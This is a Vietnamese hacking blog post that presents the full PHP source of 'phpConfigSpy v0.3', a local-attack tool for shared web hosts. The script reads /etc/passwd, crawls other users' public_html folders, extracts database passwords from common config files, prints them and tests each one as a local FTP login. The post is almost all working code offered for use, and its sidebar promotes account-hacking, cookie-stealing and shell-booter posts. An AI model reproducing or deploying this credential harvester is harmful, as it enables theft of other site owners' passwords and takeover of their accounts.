• About
  • Policy
  • Contact

Phan Anh Buổi Sáng

  • Home
  • Kiến thức IT
    • PSD
    • Blogger
  • Translate
Google
Custom Search
Trang chủ » Code » Local Attack » Shell » phpConfigSpy v0.3

phpConfigSpy v0.3

Unknown Labels: Code, Local Attack, Shell Leave A Comment 20:56
Code:
<?php 
/* 
h-b@usa.com 
*/ 
echo '<html><head><title>phpConfigSpy v0.3</title></head><body>'; 
($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>'); 
set_time_limit(0); 
################### 
@$passwd = fopen('/etc/passwd','r'); 
if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); } 
$pub = array(); 
$users = array(); 
$conf = array(); 
$i = 0; 
while(!feof($passwd)) 
{ 
$str = fgets($passwd); 
 if ($i > 35) 
 { 
  $pos = strpos($str,':'); 
  $username = substr($str,0,$pos); 
  $dirz = '/home/'.$username.'/public_html/'; 
  if (($username != '')) 
  { 
   if (is_readable($dirz)) 
   { 
    array_push($users,$username); 
    array_push($pub,$dirz); 
   } 
  } 
   } 
$i++; 
} 
################### 
echo '<br><br><textarea cols="80" rows="60">'; 
echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"; 
echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"; 
echo "[~] Searching for passwords in config files...\n\n"; 
foreach ($users as $user) 
{ 
$path = "/home/$user/public_html/"; 
read_dir($path,$user); 
} 
echo "\n[+] Done\n"; 
function read_dir($path,$username) 
{ 
if ($handle = opendir($path)) 
{ 
 while (false !== ($file = readdir($handle))) 
 { 
  $fpath = "$path$file"; 
  if (($file != '.') and ($file != '..')) 
  { 
   if (is_readable($fpath)) 
   { 
    $dr = $fpath."/"; 
    if (is_dir($dr)) 
    { 
     read_dir($dr,$username); 
    } 
    else 
    { 
                        if ( 
                         ($file=='config.php') 
                        or ($file=='config.inc.php') 
                        or ($file=='conf.php') 
                        or ($file=='settings.php') 
                        or ($file=='setup.php') 
                        or ($file=='order.php') 
                        or ($file=='dbconf.php') 
                        or ($file=='db.inc.php') 
                        or ($file=='dbconfig.php') 
                        or ($file=='configuration.php') 
                        or ($file=='adminconfig.php') 
                        or ($file=='configoption.php') 
                        or ($file=='ini.inc.php') 
                        or ($file=='configitem.php') 
                        or ($file=='db.inc.php') 
                        or ($file=='dbconnect.php') 
                        or ($file=='conf-init.php') 
                        or ($file=='dbinfo.php') 
                        or ($file=='connect.php') 
                        or ($file=='configure.php') 
                        or ($file=='smtp.php') 
                        or ($file=='include.php') 
                        or ($file=='index.php') 
                        or ($file=='common.php') 
                        or ($file=='config_global.php') 
                        or ($file=='admin.php') 
                        or ($file=='db.php') 
                        or ($file=='connect.inc.php') 
                        or ($file=='dbconnect.inc.php')) 
                       { 
      $pass = get_pass($fpath); 
      if ($pass != '') 
      { 
       echo "[+] $fpath\n$pass\n"; 
       ftp_check($username,$pass); 
      } 
     } 
    } 
   } 
  } 
 } 
} 
} 
function get_pass($link) 
{ 
@$config = fopen($link,'r'); 
while(!feof($config)) 
{ 
 $line = fgets($config); 
 if (strstr($line,'pass') 
 or strstr($line,'pwd') 
 or strstr($line,'db_pass') 
 or strstr($line,'dbpass') 
 or strstr($line,'passwd')) 
 { 
  if (strrpos($line,'"')) 
  { 
   preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass); 
   $pass = str_replace("]=\"","",$pass); 
  } 
   
  else 
   preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass); 
   $pass = str_replace("]='","",$pass); 
  return $pass[2]; 
 } 
} 
} 
function ftp_check($login,$pass) 
{ 
@$ftp = ftp_connect('127.0.0.1'); 
if ($ftp) 
{ 
 @$res = ftp_login($ftp,$login,$pass); 
 if ($res) 
 { 
  echo '[FTP] '.$login.':'.$pass."  Success !\n"; 
 } 
 else ftp_quit($ftp); 
} 
} 
echo '</textarea><br><br>Coded by <b>Hack-Back</b> & <b>config-location-2@@8</b>  <a href=http://www.hac-zone.com></a></body></html>'; 
?>

Bài viết liên quan

← Bài đăng mới hơn Bài đăng cũ hơn → Trang chủ
Powered by Blogger.

Các Bình Luận Gần Đây

Bài đăng phổ biến

  • vBulletin 3.0 Private Message HTML Injection Vulnerability
    source: http://www.securityfocus.com/bid/7594/info A vulnerability has been reported in vBulletin 3.0.0 beta 2. The problem is said to occ...
  • PSD - Người & Ta
    DOWNLOAD PSD
  • Share CMND Nữ Cho Anh Em Để Unlock & Report
    COPYRIGHT : MINH HAKU IT                                               
  • FCKEditor ASP Version 2.6.8 File Upload Protection Bypass
    - Title: FCKEditor 2.6.8 ASP Version File Upload Protection bypass - Credit goes to: Mostafa Azizi, Soroush Dalili - Link:http://sourceforge...
  • Hack Yahoo Accounts easily, 2012
    1. Download the required Cookie Stealer Script from here http://freakshare.com/files/cjflnpra/yahoo-cookie-stealer-by-wildhacker.com.rar.h...
  • Exploiting Java Applet JAX-WS Remote Code Execution
    Recientemente se ha publicado una nueva vulnerabilidad en Java, denominada  Java Applet JAX-WS Remote Code Execution  descubierta por  @_jua...
  • [Tutorial] Setting Up Ancient Booter
    Hello guys today ill show you how to setup Web based Shell Booter Ancient Booter Things you'll need for this 1st. Cpanel 2nd. Ancient ...
  • [PHP] Get list username - vBulletin
    <?php // GET user function duyk_get_all_usr($link, $total_usr) { $max_page = $total_usr/100; $ma...
  • Mannu shell version 2 by Indishell
    Mannu shell version 2 with some new features and modified interface look Download link: --==[[ http://www.mediafire.com/download.php?a72ttl...
  • SERVER-SIDE INCLUDES (SSI) INJECTION
    It is a web attack were a remote attacker can execute commands on the server remotely, SSI Injections are used to execute some content bef...

Pageviews from the past week

Chuyên mục

Bài đăng phổ biến

  • vBulletin 3.0 Private Message HTML Injection Vulnerability
    source: http://www.securityfocus.com/bid/7594/info A vulnerability has been reported in vBulletin 3.0.0 beta 2. The problem is said to occ...
  • PSD - Người & Ta
    PSD - Người & Ta
    DOWNLOAD PSD
  • Share CMND Nữ Cho Anh Em Để Unlock & Report
    Share CMND Nữ Cho Anh Em Để Unlock & Report
    COPYRIGHT : MINH HAKU IT                                               
  • FCKEditor ASP Version 2.6.8 File Upload Protection Bypass
    - Title: FCKEditor 2.6.8 ASP Version File Upload Protection bypass - Credit goes to: Mostafa Azizi, Soroush Dalili - Link:http://sourceforge...
  • Hack Yahoo Accounts easily, 2012
    Hack Yahoo Accounts easily, 2012
    1. Download the required Cookie Stealer Script from here http://freakshare.com/files/cjflnpra/yahoo-cookie-stealer-by-wildhacker.com.rar.h...
  • Exploiting Java Applet JAX-WS Remote Code Execution
    Recientemente se ha publicado una nueva vulnerabilidad en Java, denominada  Java Applet JAX-WS Remote Code Execution  descubierta por  @_jua...
  • [Tutorial] Setting Up Ancient Booter
    [Tutorial] Setting Up Ancient Booter
    Hello guys today ill show you how to setup Web based Shell Booter Ancient Booter Things you'll need for this 1st. Cpanel 2nd. Ancient ...
  • [PHP] Get list username - vBulletin
    <?php // GET user function duyk_get_all_usr($link, $total_usr) { $max_page = $total_usr/100; $ma...
  • Mannu shell version 2 by Indishell
    Mannu shell version 2 with some new features and modified interface look Download link: --==[[ http://www.mediafire.com/download.php?a72ttl...
  • SERVER-SIDE INCLUDES (SSI) INJECTION
    It is a web attack were a remote attacker can execute commands on the server remotely, SSI Injections are used to execute some content bef...
Google
Custom Search
Support: Facebook | Twitter | Google+ | Giới thiệu
Copyright © 2015 • Phan Anh Buổi Sáng • All Right Reserved. Template by Template Việt